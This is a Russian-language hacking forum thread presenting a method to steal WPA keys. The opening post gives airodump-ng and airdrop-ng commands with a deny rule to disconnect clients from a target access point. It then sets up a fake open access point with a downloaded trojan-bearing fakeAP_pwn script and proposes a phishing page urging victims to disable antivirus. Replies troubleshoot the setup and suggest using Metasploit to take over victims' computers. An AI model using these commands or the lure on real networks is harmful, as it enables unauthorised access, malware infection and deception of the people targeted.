Новый способ получения WPA ключа

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by 4ikotillo, 28 Oct 2010.

  1. 4ikotillo

    4ikotillo Elder - Старейшина

    Joined:
    29 Jun 2008
    Messages:
    444
    Likes Received:
    78
    Reputations:
    51
    всем привет! Как и обещал выкладываю новую методику добычи WPA ключа. Подчеркиваю, все что буден описанно ниже - теоритический материал и мной на практике не использовался.
    Тестированием и отладкой данной методики займемся вместе, если есть желание и если она будет работать. Для данного метода потребуется 2 wifi адаптера(естественно с поддеркой в BackTrack)

    Немного о самой методике. Сначала с помощью утилы airdrop-ng, начинаем флудить эфир, отрезаем клиента от точки и не даем ему к ней коннектится.
    На втором этапе создаем такую же точку только без шифрования. Если клиент подключается, автоматом засылаем ему сплоит, который вынимает все пароли на точки, в том числе и на ту WPA, которая нам нужна.

    Для примера возьмем такие параметры:

    BSSID: 00:18:A5:42:AA:CA
    Client: 00:00:15:CB:71:85

    mon0 - первая карта
    mon1 - вторая карта

    Этап 1 - airdrop-ng.

    Запускаем первую карту мониторить эфир и собирать все в файл.

    airodump-ng mon0 -w test --output-format csv (test название файла, куда будет писатся весь дамп, csv формат выводимого файла)

    После чего видим в эфире точку BSSID: 00:18:A5:42:AA:CA(допустим с шифрованием WPA-PSK), и подключенного к ней клиента 00:00:15:CB:71:85.

    Далее создаем правило для airdrop-ng

    echo '#Deny rules' > rules && echo 'd/00:18:A5:42:AA:CA|any' >> rules (данное правило запрещает любым устройствам подключатся к точке с указанным маком)

    Далее запускаем саму программу airdrop-ng

    cd /pentest/wireless/airdrop-ng/

    airdrop-ng -i mon0 -t ~/test-01.csv -r ~/rules

    Все, клиенты скинулись с точки. Можете легко редактировать правила ограничения доступа к точке с помощью комманды

    nano rules

    После чего естественно airdrop-ng надо перезапустить.

    Все, клиенты отключены, интерфейс mon0 это контролирует, переходим ко второму этапу.


    2 этап. Fake AP и вытягивание пароля.

    качаем архив http://www.mediafire.com/?hakic7kqk8b6e8c (антивирь будет ругаться что внутри трой, далее мы будем его использовать для получуния пароля)

    архив надо кинуть на рабочий стол BackTrack

    после чего разархивировать и запустить

    tar xf fakeAP_pwn-v0.3.tar
    cd fakeAP_pwn
    ls
    mkdir /var/www/fakeAP_pwn
    cp www/* /var/www/fakeAP_pwn
    bash fakeAP_pwn.sh -m non -p wkv -v


    Все, процесс пошел. Когда клиент залогинется вы увидете, если все пройдет успешно, то в окне wifi keys у вас появятся ключики к сетям =)


    Теперь добавлю немного от себя. Этот метод основан на слове ЕСЛИ! Так что он годится для энтузиастов =)
    Не забываем что перед запуском fakeAP нам необходимо настроить файл fakeAP_pwn.sh и вбить туда свой интерфейс. естественно надо перевести карту в режим мониторинга на 1 этапе. AirDrop-ng необходимо скачать и установить, если у вас не BackTrack 4 BlackHat R1.
    Будем шлейфовать данный метод, может до ума доведем.
    Опять же, желательно отредактировать index.php, перевести на русский язык и написать там, что "Компьютер находится в опасности, обнаружена критическая уязвимость, отключите антивирус и скачайте нижеуказанное обновление".

    Буду подправлять по возможности.

    Источники:

    1 Этап.

    Статья - http://adaywithtape.blogspot.com/2010/03/airdrop-ng.html
    Видео - http://blip.tv/file/3292804/

    2 Этап.

    Статья - http://www.backtrack-linux.org/forums/backtrack-videos/32462-[script]-[video]-fakeap_pwn-v0-3-a.html
    Видео - http://g0tmi1k.blip.tv/file/4079518
     
    1 person likes this.
  2. 4ikotillo

    4ikotillo Elder - Старейшина

    Joined:
    29 Jun 2008
    Messages:
    444
    Likes Received:
    78
    Reputations:
    51
    Странно, при поднятии fakeAP, на атакуемой машине все страницы ссылаются не на созданный файл index.php, а на дефолтную страницу апача, где написано только "It works". Пока не знаю как это исправить, поскольку в этом не селен. Но на BackTrack отображается что я приконнектился и если запросить 10.0.0.1:4564, то сплоит скачивается.
     
    1 person likes this.
  3. Machine

    Machine Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    403
    Likes Received:
    116
    Reputations:
    117
    Автор, окстись. Новой методикой тут не пахнет.

    Если взял чужой скрипт, то, удосужься прочитать как им пользоваться.

    С сабжем (т.е. скриптом g0tmi1k'а)ты не разобрался, по этой причине у тебя апачем с дефолтным индексом.
    В архиве лежит фейковая страница на которую ведут пользователя, а также 3 разные начинки.

    Интересно, как ты описываешь работоспособность скрипта, перевод фейковой страницы, которая у тебя даже не открывается?? :)

    Содержимое папки fake_ap закинь в /var/www

    Вообщем, автор опозорился.
     
    2 people like this.
  4. 4ikotillo

    4ikotillo Elder - Старейшина

    Joined:
    29 Jun 2008
    Messages:
    444
    Likes Received:
    78
    Reputations:
    51
    Ну да, наверное лохонулся... Удаляйте тему нафиг.
     
    1 person likes this.
  5. akamaxmzx

    akamaxmzx New Member

    Joined:
    10 Dec 2010
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    ну интересно все таки . а старый метод какой по словарю ? :))
     
  6. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    525
    Reputations:
    285
    видео старый метод видео новое вчера зделал а метод старый ))))
     
  7. dupD0M

    dupD0M Elder - Старейшина

    Joined:
    18 May 2010
    Messages:
    1,130
    Likes Received:
    74
    Reputations:
    34
    все там раблотает!видео от готмилка есть там все попклярно показано и оно работает как по вайфай так и по сети если чуток подхимичить!ток надо сперва апач чуток пересобрать и дописать!а лучше всего это делать через метасплоит и проблем меньше ....и собстно то если сплоит на компе таргете то нах тот пароль на точку ??ведь можно комп порутать и это намного лучше чем доставать какието пароли на точку!


    upd:nessus тоже поможет в данной ситуэйшэне чем дропать точку

    upd:и тем более фекапа есть готовый скрипт на котором не че не надо делать!ток выбрать шото там и усе оно само сделает
     
    #7 dupD0M, 25 Apr 2011
    Last edited: 25 Apr 2011
    1 person likes this.
  8. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    88
    Likes Received:
    7
    Reputations:
    1
    народ делал все по видео готмилка, вылезает только окно Apache It works, и самого фейка нету.Обьясните плз подробно что и где нада исправить.
     
  9. alex-ko

    alex-ko New Member

    Joined:
    15 May 2011
    Messages:
    11
    Likes Received:
    1
    Reputations:
    1
    Привет всем, прошу прощение, может не в эту тему пишу, но у меня вопрос:
    почему когда пытаюсь наловить пакеты точки, ни один пакет не ловится. ждал по-моему целый день, всего один пакет появился. Ловил в помощью проги CommView For Wi-FI
    Спасибо за ответ.
     
    1 person likes this.
  10. kosmaty

    kosmaty Elder - Старейшина

    Joined:
    26 Sep 2011
    Messages:
    292
    Likes Received:
    38
    Reputations:
    27
    Созрел вопрос по теме.
    Просмотрел многократно видео от Готмилка, но так и не въехал - как у винды спросить пасс на ВайФай? Ipconfig такой инфы не дает, netsh тоже, консоль здесь вообще, я так полагаю, бесполезна. А ремоут десктоп - это палево, у чувака мышка сама будет тыркать по ярлыкам - я бы сразу стреманулся :)
     
    #10 kosmaty, 1 Nov 2011
    Last edited: 1 Nov 2011